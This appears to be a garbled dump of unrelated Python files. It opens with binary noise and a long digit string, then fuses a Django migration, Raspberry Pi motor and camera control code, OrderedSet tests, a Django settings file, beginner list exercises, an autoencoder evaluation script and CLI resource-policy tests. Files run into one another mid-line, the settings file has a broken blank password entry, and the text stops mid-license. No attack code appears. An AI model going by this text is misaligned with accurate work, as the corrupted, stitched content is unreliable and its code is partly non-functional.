n u | � � � � � � � � � � � � � � � � � �   '.5<CJRY_flsz������������������ &.6=DKRZ`hov|������������������164703520371741877972279888431699781480641047165512582574106307065963314310212416562872985729227474116759156368864114314782475966105313441026597050292745995300108699829409860987812725285805641134926519977470179219935420731150888511394053897642929757041738419312347334719614361665050610887111638900739860744602777121264115418727312796114394858215425328697663663118881932990748104974299768315303332011573852676505630472114382492346349230067554235847366342744209153490401013961810565259158450840198064593302491264114937822332401251758777389964108464124852074046201382131334236295302503270183018570739075346830982203689411642134858337311704915177654944366881030150811729683684376467751010355964315130335482535421020310982156128980474665857602936675557702012773452118674517529029944527124910011614403678169802559110634095382160211089524577987370334101179480835734411339321656941788181388787472791249381536267127756618132025001014242594517342447611984064449242912061199103538003505019918515055551927941243591987011768698859742987354569306328831844541306250271784587447434989105053123318763299120549345370084221234055027016212772458662615710929204601384136953929576584339561689110081928479723645480897574028695153597327833312478496684433521844695445625572307522671158954521531880485910612138193851676811994229748883984268718106831199457813404769408073255358226451148977168857965902431830207312781599346941514866215211600266325649310272008100807253193447678419194080683271830885287578493921140478211827882115520811221055633568577652399350493463801151025966078275518678726807834620831601779945105897581180632577860188252567737010106564506905611124634266266911189569577316412955798470285611587881229866928149607876144978135479725774931086156225721212097915027115082810412445109063851152191496444182129809540736954127671962010059552511808324626431044751863633384993840124277331680376112062157585999744313691605511310409552347427335310608558488430465401442338739888679047816221914678193173233722354854173588533829014779337753063469390408141207221951921026671081582249467326357443649847124374348404213682097883715801255235945309777471768124230645056019761811841305212344788654317615190311212529863619261706145243337910260121112067271174185211334004124656811163045849366709613519122511453022829909200049843862290218329857150784761103448841232647276807145972446146686995050750048535834517522043508726012069570119006798646613449261571184358260194108842948961031110874473039637998634227518380505887762958866105073360867203057468699460612751039277019793857108557137238539878319351631169601957921873696969173563973319965336496219776949031054950474086228873824813014429813174675728462314095409619557096280178419256742122812326717359378320565021030199911290142469824410836318955318109355208853355120601372810201450078112136547890436721937716970222220334311047948054982487781411576552518000814692412344192120496652374746420682331293421270094665950881207640263898485983672113356691639165158058710069931979706120651811637592734401223317557933464800486376207794263416831031014272160218901077222910075649445579410694217885013296941118121271186473898267334193365405168038450978581123216062524043111029988117237481232762253311904980272594390341645298835777544742222523572647770123399192643600920476837462389252172021642190011877911127724845801186985855412107331483379363305469938159101013787013227422368122735613069592189508699034117421821619854410067259347445304250970324326209132485803928297110047511139656211250524623949772688639355412402429854422212624991236195417527568518516120841245468669263831747878322312085763531474234134703651160853391797648907365218267267070712708095445201011700196217848262790535049892059097197217742449712125043148875824287500771106004164177088011743123780472336694123939041174602725590113625256117647938621209078072117940811149066120409663823165100359721696268594869869102611101692710128677962451966925794341489387254210344976686743101042805863751597726456189510695507980954486871742926047930731810226228464746910008726460617332600481132683392351092989225976775310572738115484226757523032086�� �GJ�J:O\`�c�x��ґ����G�7���E�5���f�;���=��  �~�aFG�I�L SFW�[ `�`i�ib�ɓj�l��?�*����������Ub�h8�ڌ��`�-�5�C\F�JR�S \/`5��8�3�ÒP��w�����-�2�����������O�)�V��/;8�<V>V?�@�BH YjZ?_�j�l-�Ď��q�������7" I�0$4�=H�e)nCr�t�|�� �O�F����Ǫìηq���+�=���� � �I����՛�T����]��?uD�D�Y{r�X���g�A& �I �K �Z �_ 0` �c �s �{ �| �| � s� ?� Ϧ [� �� �� �� x� 5  � p � � QT ^ I^ '} ʖ �� x� �� �   V �8 z[ '� � � �@ _\ �^ Gf �h _v e� �� �� � g R �" a( + Xy �z (� w� z� �� �� v� "� V �\u_�l�x���\�X���O5�^�fpr��{�"1KQ�SxU�UIX2Y�^h��L�p�ލl�.�����������vG�Ij���s�����N����J�:*?7L�L]_��8�&�������������F����.�� �f�,�2�S�X�u�vnxC~I���� � Z �l%(t0�2z4�4�u�vw�ߑҒ��2�]�l���D�|%1*�-S3�=vV%x�����H���C|/ �v�'�0�5�; @DAbG6L=OfXOZ�\T^�oL�ǫ�������c��#Z}h:���� ����� �9�� ��!K:B>`L�h�iPk��q�C�������)��U�W�W�XRZa�g�jȁԇ�ӐS�J��24D�QTzg�{o�I�Ä!�<��N�'�9�@�{��u���� G�sF�ʌC�2��� ���&*e*�1�8q;�=�A�n�������� �9=L�LDf:G����i���;���{�z�� � �# �) �+ �0 � ٜ � u� !� :� T� �/! 0!8!۰!��!��!�!/�!��!�!u�!99"�O"�c"g"�n"d�"��"p�"v�"��"a�"��"P�"��"I�"�!#"#"%#�;#$<#�<#IE#�U#^#�^#�j#6q#Dr#�s#/{#]�#�#��#y�#��#3�#$�$�'$�0$;6$�>$�D$c$�t$�v$��$�$��$>�$��$ �$Z�$?�$��$D�$ �$ �$L�$%%%B%#+%rE%uW%�Y%D[%�r%�t%�{%I|%G�&��&K�&��&X�&danjac/jcasts # Generated by Django 3.2.9 on 2021-11-30 07:43 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ("podcasts", "0108_podcast_websub_callback_exception"), ] operations = [ migrations.RemoveField( model_name="podcast", name="websub_callback_exception", ), ] 0 """ DCMotor ======= """ import time import RPi.GPIO as GPIO Motor_A_EN = 4 Motor_B_EN = 17 Motor_A_Pin1 = 26 Motor_A_Pin2 = 21 Motor_B_Pin1 = 27 Motor_B_Pin2 = 18 forward = 0 backward = 1 pwm_A = 0 pwm_B = 0 class DCMotor: """DC 모터를 제어합니다.""" def __init__(self): """DC 모터 GPIO를 연결하고 초기화합니다.""" global pwm_A, pwm_B GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) GPIO.setup(Motor_A_EN, GPIO.OUT) GPIO.setup(Motor_B_EN, GPIO.OUT) GPIO.setup(Motor_A_Pin1, GPIO.OUT) GPIO.setup(Motor_A_Pin2, GPIO.OUT) GPIO.setup(Motor_B_Pin1, GPIO.OUT) GPIO.setup(Motor_B_Pin2, GPIO.OUT) self.motorStop() try: pwm_A = GPIO.PWM(Motor_A_EN, 1000) pwm_B = GPIO.PWM(Motor_B_EN, 1000) except: pass def motor_right(self, status, direction, speed): """우측 모터를 제어합니다.""" if status == 0: # stop GPIO.output(Motor_A_Pin1, GPIO.LOW) GPIO.output(Motor_A_Pin2, GPIO.LOW) GPIO.output(Motor_A_EN, GPIO.LOW) else: if direction == forward: GPIO.output(Motor_A_Pin1, GPIO.LOW) GPIO.output(Motor_A_Pin2, GPIO.HIGH) pwm_A.start(0) pwm_A.ChangeDutyCycle(speed) elif direction == backward: GPIO.output(Motor_A_Pin1, GPIO.HIGH) GPIO.output(Motor_A_Pin2, GPIO.LOW) pwm_A.start(100) pwm_A.ChangeDutyCycle(speed) def motor_left(self, status, direction, speed): """좌측 모터를 제어합니다.""" if status == 0: # stop GPIO.output(Motor_B_Pin1, GPIO.LOW) GPIO.output(Motor_B_Pin2, GPIO.LOW) GPIO.output(Motor_B_EN, GPIO.LOW) else: if direction == forward: GPIO.output(Motor_B_Pin1, GPIO.LOW) GPIO.output(Motor_B_Pin2, GPIO.HIGH) pwm_B.start(0) pwm_B.ChangeDutyCycle(speed) elif direction == backward: GPIO.output(Motor_B_Pin1, GPIO.HIGH) GPIO.output(Motor_B_Pin2, GPIO.LOW) pwm_B.start(100) pwm_B.ChangeDutyCycle(speed) def move(self, speed, direction, turn, radius=0.8): # 0 < radius <= 1 """양쪽 모터를 제어하여 기기를 움직입니다.""" if direction == 'forward': self.motor_left(1, forward, speed - (turn * radius)) self.motor_right(1, forward, speed + (turn * radius)) elif direction == 'backward': self.motor_left(1, backward, speed - (turn * radius)) self.motor_right(1, backward, speed + (turn * radius)) else: pass def motorStop(self): """모터를 정지합니다.""" GPIO.output(Motor_A_Pin1, GPIO.LOW) GPIO.output(Motor_A_Pin2, GPIO.LOW) GPIO.output(Motor_B_Pin1, GPIO.LOW) GPIO.output(Motor_B_Pin2, GPIO.LOW) GPIO.output(Motor_A_EN, GPIO.LOW) GPIO.output(Motor_B_EN, GPIO.LOW) """ ServoMotor ========== """ import Adafruit_PCA9685 import threading pwm = Adafruit_PCA9685.PCA9685() pwm.set_pwm_freq(50) init_pwm0 = 300 init_pwm1 = 300 init_pwm2 = 300 class ServoMotor: """ 서보 모터를 제어합니다. 기존 16개 서보모터 -> 3개로 축소 0: 앞바퀴 방향. 0=정면 1: 카메라 좌우. 0=정면 2: 카메라 상하. 0=정면 """ def __init__(self): self.sc_direction = [1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1] self.initPos = [init_pwm0,init_pwm1,init_pwm2] self.nowPos = [300,300,300] self.maxPos = [560,560,560] self.minPos = [100,100,100] self.ctrlRangeMax = 560 self.ctrlRangeMin = 100 self.angleRange = 180 self.initConfig(1, 297, 1) self.initConfig(2, 140, 1) def moveInit(self): for i in range(0,3): pwm.set_pwm(i,0,self.initPos[i]) self.nowPos[i] = self.initPos[i] def initConfig(self, ID, initInput, moveTo): if initInput > self.minPos[ID] and initInput < self.maxPos[ID]: self.initPos[ID] = initInput if moveTo: pwm.set_pwm(ID,0,self.initPos[ID]) else: print('initPos Value Error.') def moveServoInit(self, ID): for i in range(0,len(ID)): pwm.set_pwm(ID[i], 0, self.initPos[ID[i]]) self.nowPos[ID[i]] = self.initPos[ID[i]] def pwmGenOut(self, angleInput): return int(round(((self.ctrlRangeMax-self.ctrlRangeMin)/self.angleRange*angleInput),0)) def moveAngle(self, ID, angleInput): self.nowPos[ID] = int(self.initPos[ID] + self.sc_direction[ID]*self.pwmGenOut(angleInput)) if self.nowPos[ID] > self.maxPos[ID]:self.nowPos[ID] = self.maxPos[ID] elif self.nowPos[ID] < self.minPos[ID]:self.nowPos[ID] = self.minPos[ID] pwm.set_pwm(ID, 0, self.nowPos[ID]) def setPWM(self, ID, PWM_input): self.nowPos[ID] = PWM_input pwm.set_pwm(ID, 0, PWM_input) """ Tracking ======== """ line_pin_right = 19 line_pin_middle = 16 line_pin_left = 20 class Tracking: """트래킹 모듈을 제어합니다.""" def __init__(self): GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) GPIO.setup(line_pin_right,GPIO.IN) GPIO.setup(line_pin_middle,GPIO.IN) GPIO.setup(line_pin_left,GPIO.IN) self.status_right = None self.status_middle = None self.status_left = None def get_signal(self): self.status_right = GPIO.input(line_pin_right) self.status_middle = GPIO.input(line_pin_middle) self.status_left = GPIO.input(line_pin_left) return (self.status_left, self.status_middle, self.status_right) """ Camera ====== """ import cv2 import numpy as np def get_line(lineIndex_Pos, thickness, offset): lines = [] left = 999 right = 0 for pixel in lineIndex_Pos[0]: if pixel != right + 1: if abs((right - left) - thickness) <= offset: line_center = (left + right) // 2 lines.append(line_center) left = pixel continue left = pixel pixel_old = pixel right = pixel lines.sort(key=lambda x: abs(x - 320)) return lines[0] class Camera: """카메라를 제어합니다.""" def __init__(self): self.linePos_1 = 440 self.linePos_2 = 380 self.lineColorSet = 0 self.center_Pos1 = None self.center_Pos2 = None self.center = None self.thickness1 = 88 self.thickness2 = 78 self.offset = 20 self.camera = cv2.VideoCapture(0) def set_thick(self, thickness, offset): self.thickness1 = thickness self.thickness2 = int(thickness * 0.9) self.offset = offset def findline(self): _, frame_image = self.camera.read() frame_findline = cv2.cvtColor(frame_image, cv2.COLOR_BGR2GRAY) retval, frame_findline = cv2.threshold(frame_findline, 0, 255, cv2.THRESH_OTSU) frame_findline = cv2.erode(frame_findline, None, iterations=6) colorPos_1 = frame_findline[self.linePos_1] colorPos_2 = frame_findline[self.linePos_2] try: lineIndex_Pos1 = np.where(colorPos_1 == self.lineColorSet) lineIndex_Pos2 = np.where(colorPos_2 == self.lineColorSet) self.center_Pos1 = get_line(lineIndex_Pos1, self.thickness1, self.offset) self.center_Pos2 = get_line(lineIndex_Pos2, self.thickness2, self.offset) self.center = (self.center_Pos1 + self.center_Pos2) // 2 except: self.center = 320 return self.center # Copyright (c) 2014, # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of Ordered Set nor the names of its contributors may be # used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF # THE POSSIBILITY OF SUCH DAMAGE. import copy import gc import pickle import sys import unittest import weakref from myia.utils.orderedset import OrderedSet class TestOrderedset(unittest.TestCase): def setUp(self): self.lst = list(range(10)) def test_add_new(self): oset = OrderedSet(self.lst) lst = self.lst item = 10 lst.append(item) oset.add(item) self.assertEqual(list(oset), lst) def test_add_existing(self): oset = OrderedSet(self.lst) lst = self.lst oset.add(1) oset.add(3) self.assertEqual(list(oset), lst) def test_discard(self): oset = OrderedSet([1, 2, 3]) oset.discard(1) self.assertNotIn(1, oset) oset.discard(4) def test_pop(self): oset = OrderedSet([1, 2, 3]) v = oset.pop() self.assertEqual(v, 3) self.assertNotIn(v, oset) def test_remove(self): oset = OrderedSet(self.lst) lst = self.lst oset.remove(3) lst.remove(3) self.assertEqual(list(oset), lst) def test_clear(self): val = frozenset([1]) oset = OrderedSet() ws = weakref.WeakKeyDictionary() oset.add(val) ws[val] = 1 oset.clear() self.assertEqual(list(oset), []) del val gc.collect() self.assertEqual(list(ws), []) def test_copy(self): oset1 = OrderedSet(self.lst) oset2 = oset1.copy() self.assertIsNot(oset1, oset2) self.assertEqual(oset1, oset2) oset1.clear() self.assertNotEqual(oset1, oset2) def test_reduce(self): oset = OrderedSet(self.lst) oset2 = copy.deepcopy(oset) self.assertEqual(oset, oset2) oset3 = pickle.loads(pickle.dumps(oset)) self.assertEqual(oset, oset3) oset.add(-1) self.assertNotEqual(oset, oset2) def test_difference_and_update(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([3, 4, 5]) oset3 = oset1 - oset2 self.assertEqual(oset3, OrderedSet([1, 2])) self.assertEqual(oset1.difference(oset2), oset3) oset4 = oset1.copy() oset4 -= oset2 self.assertEqual(oset4, oset3) oset5 = oset1.copy() oset5.difference_update(oset2) self.assertEqual(oset5, oset3) def test_intersection_and_update(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([3, 4, 5]) oset3 = oset1 & oset2 self.assertEqual(oset3, OrderedSet([3])) oset4 = oset1.copy() oset4 &= oset2 self.assertEqual(oset4, oset3) oset5 = oset1.copy() oset5.intersection_update(oset2) self.assertEqual(oset5, oset3) def test_issubset(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([1, 2]) self.assertTrue(oset2 < oset1) self.assertTrue(oset2.issubset(oset1)) oset2 = OrderedSet([1, 2, 3]) self.assertTrue(oset2 <= oset1) self.assertTrue(oset1 <= oset2) self.assertTrue(oset2.issubset(oset1)) oset2 = OrderedSet([1, 2, 3, 4]) self.assertFalse(oset2 < oset1) self.assertFalse(oset2.issubset(oset1)) self.assertTrue(oset1 < oset2) # issubset compares underordered for all sets oset2 = OrderedSet([4, 3, 2, 1]) self.assertTrue(oset1 < oset2) def test_issuperset(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([1, 2]) self.assertTrue(oset1 > oset2) self.assertTrue(oset1.issuperset(oset2)) oset2 = OrderedSet([1, 2, 3]) self.assertTrue(oset1 >= oset2) self.assertTrue(oset2 >= oset1) self.assertTrue(oset1.issubset(oset2)) oset2 = OrderedSet([1, 2, 3, 4]) self.assertFalse(oset1 > oset2) self.assertFalse(oset1.issuperset(oset2)) self.assertTrue(oset2 > oset1) # issubset compares underordered for all sets oset2 = OrderedSet([4, 3, 2, 1]) self.assertTrue(oset2 > oset1) def test_symmetric_difference_and_update(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([2, 3, 4]) oset3 = oset1 ^ oset2 self.assertEqual(oset3, OrderedSet([1, 4])) oset4 = oset1.copy() self.assertEqual(oset4.symmetric_difference(oset2), oset3) oset4 ^= oset2 self.assertEqual(oset4, oset3) oset5 = oset1.copy() oset5.symmetric_difference_update(oset2) self.assertEqual(oset5, oset3) def test_union_and_update(self): oset = OrderedSet(self.lst) lst = self.lst oset2 = oset.union([3, 9, 27]) self.assertEqual(oset2, OrderedSet(lst + [27])) # make sure original oset isn't changed self.assertEqual(oset, OrderedSet(lst)) oset1 = OrderedSet(self.lst) oset2 = OrderedSet(self.lst) oset3 = oset1 | oset2 self.assertEqual(oset3, oset1) self.assertEqual(oset3, oset1.union(oset2)) oset1 |= OrderedSet("abc") self.assertEqual(oset1, oset2.union("abc")) oset1 = OrderedSet(self.lst) oset1.update("abc") self.assertEqual(oset1, oset2.union("abc")) def test_union_with_iterable(self): oset1 = OrderedSet([1]) self.assertEqual(oset1.union([2, 1]), OrderedSet([1, 2])) self.assertEqual( OrderedSet([1, 2]) | OrderedSet([3, 1, 2, 4]), OrderedSet([1, 2, 3, 4]), ) # union with unordered set should work, # though the order will be arbitrary self.assertEqual(oset1.union(set([2])), OrderedSet([1, 2])) def test_symmetric_difference_with_iterable(self): oset1 = OrderedSet([1]) self.assertEqual(oset1.symmetric_difference([1]), OrderedSet([])) self.assertEqual( OrderedSet([3, 1, 4, 2]).symmetric_difference([3, 4]), OrderedSet([1, 2]), ) self.assertEqual( OrderedSet([3, 1, 4, 2]).symmetric_difference(set([3, 4])), OrderedSet([1, 2]), ) def test_intersection_with_iterable(self): self.assertEqual( OrderedSet([3, 2]).intersection([1, 2, 3]), OrderedSet([2, 3]) ) def test_difference_with_iterable(self): self.assertEqual( OrderedSet([1, 2, 3, 4]).difference([3, 2]), OrderedSet([1, 4]) ) def test_isdisjoint(self): self.assertTrue(OrderedSet().isdisjoint(OrderedSet())) self.assertTrue(OrderedSet([1]).isdisjoint(OrderedSet([2]))) self.assertFalse(OrderedSet([1, 2]).isdisjoint(OrderedSet([2, 3]))) def test_len(self): oset = OrderedSet(self.lst) self.assertEqual(len(oset), len(self.lst)) oset.remove(0) self.assertEqual(len(oset), len(self.lst) - 1) def test_contains(self): oset = OrderedSet(self.lst) self.assertTrue(1 in oset) def test_iter_mutated(self): oset = OrderedSet(self.lst) it = iter(oset) oset.add("a") with self.assertRaises(RuntimeError): next(it) def test_iter_and_valid_order(self): oset = OrderedSet(self.lst) self.assertEqual(list(oset), self.lst) oset = OrderedSet(self.lst + self.lst) self.assertEqual(list(oset), self.lst) def test_repr(self): oset = OrderedSet([1]) self.assertEqual(repr(oset), "OrderedSet([1])") def test_eq(self): oset1 = OrderedSet(self.lst) oset2 = OrderedSet(self.lst) self.assertNotEqual(oset1, None) self.assertEqual(oset1, oset2) def test_ordering(self): oset1 = OrderedSet(self.lst) oset2 = OrderedSet(self.lst) if sys.version_info < (3, 0): self.assertFalse(oset1 <= None) self.assertLessEqual(oset2, oset1) self.assertLessEqual(oset2, set(oset1)) self.assertLessEqual(oset2, list(oset1)) self.assertGreaterEqual(oset1, oset2) self.assertGreaterEqual(oset1, set(oset2)) self.assertGreaterEqual(oset1, list(oset2)) oset3 = OrderedSet(self.lst[:-1]) self.assertLess(oset3, oset1) self.assertLess(oset3, set(oset1)) self.assertLess(oset3, list(oset1)) self.assertGreater(oset1, oset3) self.assertGreater(oset1, set(oset3)) self.assertGreater(oset1, list(oset3)) from base_settings import * from prod_secrets import PSQLPW DEBUG = False ALLOWED_HOSTS = ["ADDALLOWEDHOSTSHERE"] DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'sample_db', 'USER': 'sample_db_user', 'PASSWORD': , 'HOST': 'localhost', 'PORT': '', 'TEST': { 'NAME': 'sample_db_test', } } } WEBPACK_LOADER = { 'DEFAULT': { 'BUNDLE_DIR_NAME': 'bundles/', 'STATS_FILE': os.path.join(BASE_DIR, 'webpack/webpack-stats.json'), } }n = int(input()) for i in range(2, n): if n % i == 0: print('NO') break else: print('YES') """concatenating list using +""" # a = [1, 2, 3] # b = [4, 5, 6] # c = a + b # print(a, b) # print(c) '''lists can be sliced using ":" ''' # # remember: just like in strings, the second number is "up to but not including" # t = [9, 41, 12, 3, 74, 15] # print(t) # print(t[1:3]) # print(t[:4]) # print(t[3:]) # print(t[:]) '''list methods''' # x = list() # print(type(x)) # # documentation: "dir()" # print(dir(x)) '''building a list from scratch''' # # make an empty list # stuff = list() # print(stuff) # stuff.append('book') # stuff.append(99) # print(stuff) # stuff.append('cookie') # print(stuff) '''is something in a list?''' # some = [1, 9, 21, 10, 16] # x = 20 # print('Is', x, 'in the list?\nR:', x in some) '''lists are in order''' # friends = ['Joseph', 'Glenn', 'Sally'] # print(friends) # # sort alphabetically # friends.sort() # print(friends) '''built-in functions and lists''' # nums = [3, 41, 12, 9, 74, 15] # print('Len',len(nums)) # print('Max',max(nums)) # print('Min',min(nums)) # print('Sum',sum(nums)) # print('Avg',sum(nums)/len(nums)) '''average examples''' # total = 0 # count = 0 # while True : # inp = input('Enter a number: ') # Have to continue!import argparse import numpy as np import tensorflow as tf from sklearn.metrics.pairwise import cosine_similarity from lib.model import conv_autoencoder_3d from lib.utils import load_data from lib.utils import calculate_average_precision from lib.visualize import visualize, visualize_3d_iodata, visualize_tsne def parse_args(): parser = argparse.ArgumentParser(description='Evaluate 3D Convolutional AutoEncoder') parser.add_argument('--learning_rate', default=1e-4, type=float, help='learning rate of optimizer') parser.add_argument('--data_path', default='./data/modelnet10.npz', type=str, help='path to dataset to evaluate') parser.add_argument('--use_exist_modelout', default=False, type=bool, help='whether to use existing model output in npz. If False, model evaluation will be done again') parser.add_argument('--modelout_save', default=False, type=bool, help='whether to save model output') parser.add_argument('--checkpoint_dir', default='./checkpoint', type=str, help='path to directory to checkpoint') parser.add_argument('--modeleval_out_dir', default='./output.npz', type=str, help='path to directory to save and load model evaluation output') parser.add_argument('--num_search_sample', default=1, type=int, help='the number of samples to search') parser.add_argument('--num_top_similarity', default=4, type=int, help='search top k similarity data') args = parser.parse_args() return args def similarity_search(encoded, k): """ caluculate similarity between encoded data for each row. run similar data search based on cosine similarity and return similar data index and similarity """ mat = cosine_similarity(encoded) # top k index idx = np.argsort(mat)[:, ::-1] sims = np.array([mat[i][d] for i, d in enumerate(idx)]) # return top 2 ~ k + 1 index and similarity since top 1 will be the self-data. return idx[:, 1:k + 1], sims[:, 1:k+1] def main(): # Prepare parameters args = parse_args() checkpoint_dir = args.checkpoint_dir data_path = args.data_path num_top_similarity = args.num_top_similarity num_search_sample = args.num_search_sample modelout_save = args.modelout_save use_exist_modelout = args.use_exist_modelout modeleval_out_dir = args.modeleval_out_dir # Prepare Data _, _, x_test, y_test = load_data(data_path=data_path) input_data = tf.placeholder(tf.float32, shape=[None, 32, 32, 32], name='input') net_input = input_data[:, :, :, :, np.newaxis] CAE_3D = conv_autoencoder_3d(net_input, args=args, is_training=False) if use_exist_modelout: data = np.load(modeleval_out_dir) idx = data['idx'] sims = data['sims'] encoded = data['encoded'] decoded = data['decoded'] else: with tf.Session() as sess: saver = tf.train.Saver() saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir)) feed_dict = {input_data: x_test} # extract encoded features and vectorize them encoded = CAE_3D.encoded.eval(session=sess, feed_dict=feed_dict) nd, k1, k2, k3, k4 = encoded.shape encoded = np.reshape(encoded, (nd, k1 * k2 * k3 * k4)) decoded = CAE_3D.decoded.eval(session=sess, feed_dict=feed_dict) idx, sims = similarity_search(encoded, num_top_similarity) if modelout_save: np.savez_compressed(modeleval_out_dir, idx=idx, sims=sims, encoded=encoded, decoded=decoded) # visualize encoded data with t-SNE # visualize_tsne(encoded, y_test) # add self-index as the first column self_idx = np.arange(encoded.shape[0]).reshape((encoded.shape[0], 1)) idx = np.concatenate([self_idx, idx], axis=1) # select samples to visualize randomly sample_idx = np.random.randint(0, x_test.shape[0], num_search_sample) # visualize similar search result visualize(x_test, y_test, idx[sample_idx]) # visualize input and its decoded data # visualize_3d_iodata(x_test[sample_idx], decoded[sample_idx], y_test[sample_idx]) # calculate average precision ap = calculate_average_precision(y_test, idx[sample_idx], sims[sample_idx], num_search_sample) print('Average Precision per sample : ', ap) if __name__ == '__main__': main() """Test the XTP class.""" import os from pathlib import Path from pyvotca import DFTGWBSE, Molecule from .utils import PATH_TEST def test_upgrade(): """Check the mergin between the defauls and the user input.""" os.environ["VOTCASHARE"] = PATH_TEST.absolute().as_posix() # Molecule definition mol = Molecule().read_xyz_file(PATH_TEST / "ethylene.xyz") user_options = { 'functional': 'PBE', 'basisset': 'cc-pvtz', "dftpackage": {"package": {"name": "orca", "executable": "Path/to/Orca"}}, "gwbse_engine": {"gwbse_options": {"gwbse": {"mode": 'G0W0'}}} } file = Path("dftgwbse.xml") try: votca = DFTGWBSE(mol, options=user_options) votca.update_options() assert file.exists() finally: if file.exists(): os.remove(file) import json from contextlib import closing from ...utils.cli import EOF, ClientRunnerFunc def test_add_keypair_resource_policy(run: ClientRunnerFunc): print("[ Add keypair resource policy ]") # Add keypair resource policy add_arguments = [ 'admin', 'keypair-resource-policy', 'add', '--default-for-unspecified', 'LIMITED', '--total-resource-slots', '{}', '--max-concurrent-sessions', '20', '--max-containers-per-session', '2', '--max-vfolder-count', '15', '--max-vfolder-size', '0', '--allowed-vfolder-hosts', 'local:volume1', '--idle-timeout', '1200', 'test_krp', ] with closing(run(add_arguments)) as p: p.expect(EOF) assert 'Keypair resource policy test_krp is created.' in p.before.decode(), \ 'Keypair resource policy creation not successful' # Check if keypair resource policy is created with closing(run(['--output=json', 'admin', 'keypair-resource-policy', 'list'])) as p: p.expect(EOF) decoded = p.before.decode() loaded = json.loads(decoded) krp_list = loaded.get('items') assert isinstance(krp_list, list), 'Keypair resource policy list not printed properly' test_krp = get_keypair_resource_policy_from_list(krp_list, 'test_krp') assert bool(test_krp), 'Test keypair resource policy doesn\'t exist' assert test_krp.get('total_resource_slots') == '{}', 'Test keypair resource policy total resource slot mismatch' assert test_krp.get('max_concurrent_sessions') == 20, 'Test keypair resource policy max concurrent session mismatch' assert test_krp.get('max_vfolder_count') == 15, 'Test keypair resource policy max vfolder count mismatch' assert test_krp.get('max_vfolder_size') == '0 Bytes', 'Test keypair resource policy max vfolder size mismatch' assert test_krp.get('idle_timeout') == 1200, 'Test keypair resource policy idle timeout mismatch' assert test_krp.get('max_containers_per_session') == 2,\ 'Test keypair resouce policy max containers per session mismatch' assert test_krp.get('allowed_vfolder_hosts') == ['local:volume1'], \ 'Test keypair resource policy allowed vfolder hosts mismatch' def test_update_keypair_resource_policy(run: ClientRunnerFunc): print("[ Update keypair resource policy ]") # Update keypair resource policy add_arguments = [ 'admin', 'keypair-resource-policy', 'update', '--default-for-unspecified', 'UNLIMITED', '--total-resource-slots', '{}', '--max-concurrent-sessions', '30', '--max-containers-per-session', '1', '--max-vfolder-count', '10', '--max-vfolder-size', '0', '--allowed-vfolder-hosts', 'local:volume2', '--idle-timeout', '1800', 'test_krp', ] with closing(run(add_arguments)) as p: p.expect(EOF) assert 'Update succeeded.' in p.before.decode(), 'Keypair resource policy update not successful' # Check if keypair resource policy is updated with closing(run(['--output=json', 'admin', 'keypair-resource-policy', 'list'])) as p: p.expect(EOF) decoded = p.before.decode() loaded = json.loads(decoded) krp_list = loaded.get('items') assert isinstance(krp_list, list), 'Keypair resource policy list not printed properly' test_krp = get_keypair_resource_policy_from_list(krp_list, 'test_krp') assert bool(test_krp), 'Test keypair resource policy doesn\'t exist' assert test_krp.get('total_resource_slots') == '{}', 'Test keypair resource policy total resource slot mismatch' assert test_krp.get('max_concurrent_sessions') == 30, 'Test keypair resource policy max concurrent session mismatch' assert test_krp.get('max_vfolder_count') == 10, 'Test keypair resource policy max vfolder count mismatch' assert test_krp.get('max_vfolder_size') == '0 Bytes', 'Test keypair resource policy max vfolder size mismatch' assert test_krp.get('idle_timeout') == 1800, 'Test keypair resource policy idle timeout mismatch' assert test_krp.get('max_containers_per_session') == 1,\ 'Test keypair resouce policy max containers per session mismatch' assert test_krp.get('allowed_vfolder_hosts') == ['local:volume2'], \ 'Test keypair resource policy allowed vfolder hosts mismatch' def test_delete_keypair_resource_policy(run: ClientRunnerFunc): print("[ Delete keypair resource policy ]") # Delete keypair resource policy with closing(run(['admin', 'keypair-resource-policy', 'delete', 'test_krp'])) as p: p.sendline('y') p.expect(EOF) assert 'Resource policy test_krp is deleted.' in p.before.decode(), 'Keypair resource policy deletion failed' def test_list_keypair_resource_policy(run: ClientRunnerFunc): print("[ List keypair resource policy ]") with closing(run(['--output=json', 'admin', 'keypair-resource-policy', 'list'])) as p: p.expect(EOF) decoded = p.before.decode() loaded = json.loads(decoded) krp_list = loaded.get('items') assert isinstance(krp_list, list), 'Keypair resource policy list not printed properly' def get_keypair_resource_policy_from_list(krps: list, name: str) -> dict: for krp in krps: if krp.get('name') == name: return krp return {} inducer/modepy __copyright__ = "Copyright (C) 2009-2013 " __license__ = """ Permission is hereby granted, free of charge, to any person obtaining a copy 